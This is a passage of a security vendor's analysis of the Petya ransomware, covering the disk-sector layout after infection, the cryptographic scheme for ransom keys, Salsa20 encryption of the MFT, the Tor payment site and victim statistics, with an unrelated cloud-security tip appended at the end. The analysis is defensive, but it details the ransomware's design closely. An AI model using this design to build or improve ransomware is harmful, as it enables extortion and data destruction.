When an MBR disk has been infected, the beginning of the disk has the following structure:

Number of sector Content 0 First-level malicious loader 1 – 33 Encrypted sectors 1-33 (XOR 0x37) 34 – 50 Second-level malicious code … 54 Configuration sector of the malicious program 55 Verification sector (populated with byte 0x37) 56 Encrypted original MBR code (XOR 0x37) Infecting a GPT disk

When infecting a GPT disk, Setup.dll performs more actions:

  1. Based on Primary GPT Header data, it receives the address of GPT header copy;
  2. Encrypts the GPT header copy with XOR 0x37;
  3. Performs all the actions that are performed when encrypting an MBR disk.

When a GPT disk has been infected, the beginning of the disk has the following structure:

Number of sector Content 0 First-level malicious loader 1 – 33 Encrypted sectors 1-33 (XOR 0x37) 34 – 50 Second-level malicious code … 54 Configuration sector of the malicious program 55 Verification sector (populated with byte 0x37) 56 Encrypted original MBR code (XOR 0x37) … Backup LBA –
Backup LBA + 33 Encrypted copy of GPT Header (XOR 0x37) Generation of configuration data

In the configuration sector (sector 54), the Trojan keeps the data it needs to encrypt MFT and decrypt it if the victim pays the ransom. Generation of the configuration data consists of the following steps:

  1. Setup.dll generates a random string that is 16 characters long [1-9, a-x, A-X]; we will call this string password;
  2. Generate a pair of keys: ec_session_priv (a private key, a random large integer number) + ec_session_pub (public key, a point on a standard elliptic curve secp192k1);
  3. Calculate the session secret: session_secret = ECDH (ec_session_priv, ec_master_pub); the cybercriminals’ public key ec_master_pub is contained in the Trojan’s body;
  4. Calculate the aes_key = SHA512(session_secret) – only the first 32 bytes of the hash sum are used;
  5. Encrypt the ‘password’ string by XORing it with the first 16 bytes of ec_session_pub: password_xor = ec_session_pub[0, 15] xor password;
  6. Encrypt the result using AES-256 with the key aes_key: password_aes_encr = AES_enc(password_xor);
  7. Create the array ec_session_data = [ec_session_pub, password_aes_encr];
  8. Calculate base58: ec_session_data_b58 = base58_enc(ec_session_data);
  9. Use the result to calculate SHA256: digest = sha256(ec_session_data_b58);
  10. Create array: ec_data = [check1, check2, ec_session_data_b58], where check1, check2 are bytes calculated by the formulas:
    a = digest[0] & 0xF;
    b = (digest[0] & 0xF) < 10;
    check1 = (digest[0] >> 4) + 0x57 + ((digest[0] >> 4) < 10 ? 0xD9 : 0);
    check2 = a + 0x57 + (b ? 0xD9 : 0);
  11. Based on the ‘password’, create a key for MFT encryption;
  12. Pseudocode creating a key for MFT encryption

  13. Generate IV – 8 random bytes which will be used during MFT encryption;
  14. Generate infection ID and use it to create “personalized” URLs for ransom payment webpages.

Ultimately, the configuration data structure looks like this:

In C language syntax, this structure can be presented as follows:

This is what the configuration data looks like after it is written to the hard drive:

Note that if the user turns off their computer after this stage and doesn’t switch it on again, only minimum damage will be done, as it is not difficult to decrypt data encrypted with 1-byte XOR. Therefore, a good piece of advice: if you launch an unknown file and your system suddenly crashes, showing a blue screen, you should switch off your computer and get help from a qualified specialist. The specialist should be able to identify a Petya infection and restore the disk sectors encrypted with XOR.

If, however, the computer was re-booted, then the Trojan’s third stage kicks in – the malicious code written to sectors 0 and 34–50.

The malicious loader

After rebooting, the code in sector 0 (the first-level loader) gains control. It loads the main second-level malicious code from sectors 34–50 into the memory and passes control to it. This code, in turn, receives information about the hard drives available in the system, searches for the disk where the configuration is written, reads the configuration data from sector 54 and, depending on the value in the field ‘config.state’, begins encryption (if the value is 0) or asks the user to enter the decryption key that they have purchased (if the value is 1).

Fragment of code implementing the Trojan’s logic

Encryption of MFT

The master file table (MFT) is a data structure with information about every file and directory on a volume formatted into NTFS, the file system that is used in all modern versions of Windows. The table contains the service data required to find each file on the disk. It can be compared to a table of contents in a book that tells you on which page to find a chapter. Similarly, MFT indicates which logical cluster a file is located in.

It is namely this critical area that is attacked by Petya. If the value of ‘config.state’ is equal to 0 during launch, it does the following:

  1. Displays a fake disk check message:
  2. Reads the key ‘config.salsa_key’ from the configuration sector into a local array; sets this field to zero on the disk, sets ‘config.state’ field at 1;
  3. Encrypts the verification sector 55 with the stream cipher Salsa20; this sector is populated beforehand with the byte 0x37 (see the section ‘Infecting an MBR disk’ above);
  4. Searches for each partition’s MFT on each connected hard drive;
  5. Encrypts the MFT data with cipher Salsa20. Encryption is performed in parts of 8 sectors (i.e. the size of each part is 4 KB). A counter of the encrypted parts is kept in sector 57 of the first disk.
  6. When encryption is over, it triggers a system reboot.

After the reboot, Petya displays an animated image of a flashing red and white skull drawn in ACCII-art style.

If the user presses any key, the Trojan displays a text which tells the victim in no uncertain terms what has happened.

Ransom demand and decryption

On this screen Petya displays links to the ransom payment webpages located in the Tor network (the addresses are specified in config.mal_urls), and the “personal decryption code” which the victim has to enter at either of the above sites. In reality, this “code” is the content of the field ‘config.ec_data’, hyphenated every six characters.

So, how do the cybercriminals plan to decrypt MFT, and are they even capable of doing so?

The ‘Key:’ field on this screen accepts a text string from the user. This string is checked for length (a 16-character long string is required), and then the Trojan uses it to calculate a 32-byte ‘salsa_key’ (following the algorithm discussed above in the section ‘Generation of configuration data’). The Trojan then attempts to decrypt the verification sector 55 with this key, and checks that the decrypted sector is completely populated with the byte 0x37. If it is, the key is considered correct, and Petya uses it to decrypt MFT. Then it decrypts all starting sectors encrypted with XOR 0x37, decrypts the original MBR and prompts the user to reboot the computer.

Thus, the correct string to be entered in the ‘Key:’ field is that very same ‘password‘ string that is generated in the first step when the configuration data is created.

Screen message displayed after successful decryption

The question remains: how do the cybercriminals know this string so they can communicate it to a victim who has paid the ransom? No automatic communication with C&C servers is established during the entire infection life cycle. The answer lies in the description of the algorithm for generating configuration data.

The victim is prompted to manually enter their “personal decryption code” ec_data on the ransom payment webpage. The cybercriminal can then perform the following actions:

  1. Decode base58: base58_dec(ec_session_data_b58) = ec_session_data = [ec_session_pub, password_aes_encr]
  2. Calculate session_secret = ECDH(ec_session_pub, ec_master_priv), in accordance with the Elliptic curve Diffie–Hellman properties, where ec_master_priv is a private key known to the Trojan’s creators only;
  3. Calculate aes_key = SHA256(session_secret);
  4. Decrypt AES-256: password_xor = AES_dec(password_encr);
  5. Knowing ec_session_pub, calculate the original password based on password_xor.
The ransom payment webpage

When we visit the Tor site at the URL provided by the Trojan, we see a page that requires a CAPTCHA to be entered, after which the main ransom payment page is loaded. The design of the page immediately catches the eye, with its hammer and sickle and the word ‘ransomware’ in pseudo-Cyrillic. It looks like a USSR parody along the lines of the game Red Alert.

This page displays a countdown clock showing when the ransom price will be doubled, as well as regularly updated links to news and publications related to Petya.

When the ‘Start the decryption process’ button is pressed, you end up on a page that asks you to enter the value of ‘ec_data’, which is now called “your identifier” rather than “your personal decryption code”. It looks like the cybercriminals still haven’t decided what to call this part.

When the user enters this string, the site displays the amount of ransom in BTC, information on how to purchase bitcoins, and the address where the money should be sent.

As well as that, there are two other pages on the website: FAQ and Support.

The FAQ page

The FAQ page is interesting in that it contains false information: in reality, RSA is not used by the Trojan in any way, at any stage of infection.

The Support page

On the Support page, the user is given the option of sending a message to the cybercriminals. One phrase in particular stands out: “Please write your message in english, our russian speaking staff is not always available”. This implies that there is at least one person in the group who speaks Russian.

Geographic distribution

As we noted above, the spam messages target German-speaking victims. KSN statistics clearly show that Germany is the main target for the cybercriminals.

TOP 5 countries attacked by Petya Trojan by the number of attacked users:

Country Number of attacked users 1 Germany 579 2 China 19 3 India 8 4 Japan 5 5 Russian Federation 5 Conclusion

After analyzing the Petya Trojan, we discovered that it is an unusual hybrid of an MBR blocker and data encryptor: it prevents not only the operating system from booting but also blocks normal access to files located on the hard drives of the attacked system.

Although Petya is noticeably different from the majority of ransomware that has emerged in the recent years, it can hardly be described as a fundamentally new development. The ideas behind the Trojan have been seen before in earlier malware; the creators of Petya have simply combined them all in a single creation. That said, it should be acknowledged that it requires a certain degree of technical skill to implement a low-level code to encrypt and decrypt data prior to OS booting.

Another interesting peculiarity about Petya is the pseudo-Soviet graphic design on the ransom payment website; the name of the Trojan also fits into the image of a “Russian Trojan” designed by cybercriminals. There is no certainty as to whether the Trojan’s creators originally come from Russia or other former Soviet states; however, the text on the payment page suggests there is at least one Russian speaker in the gang.

Kaspersky Lab’s products protect users from this threat: Petya’s executable files are detected with the verdict Trojan-Ransom.Win32.Petr; in addition, the behavior analyzer proactively detects even unknown versions of this Trojan with the verdict PDM:Trojan.Win32.Generic.

P.S. How to decrypt your data without paying the ransom

On April 8, some independent researchers reported that they had found a method of restoring the password without paying the ransom to the cybercriminals. The method is based on a genetic algorithm; with the 8-byte long IV (stored in configuration sector 54) and the content of the encrypted verification sector 55, you can calculate the value of the password that generates the salsa key, which can then be used to decrypt the MFT.

Cloud Security

SANS Tip of the Day - Wed, 05/04/2016 - 01:00
One of the most effective steps you can take to protect your cloud account is to make sure you are using two-step verification. In addition, always be sure you know exactly whom you are sharing files with. It is very easy to accidently share your files with the entire Internet when you think you are only sharing them with specific individuals.